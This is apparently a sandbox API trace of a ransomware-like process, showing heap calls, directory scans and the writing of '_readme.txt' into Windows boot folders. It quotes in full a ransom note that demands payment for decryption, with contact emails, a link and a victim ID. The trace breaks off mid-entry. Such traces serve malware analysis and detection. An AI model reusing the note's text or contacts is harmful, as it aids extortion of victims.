HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.884] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.884] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0127.884] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.884] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.885] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.885] PathFindFileNameW (pszPath="") returned="" [0127.885] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.885] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.886] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.886] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.886] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0127.886] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0127.891] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.891] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.897] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.897] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.897] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe373bb00, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.897] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe373bb00, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.897] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.897] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.897] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.897] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.897] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.900] RtlAllocateHeap 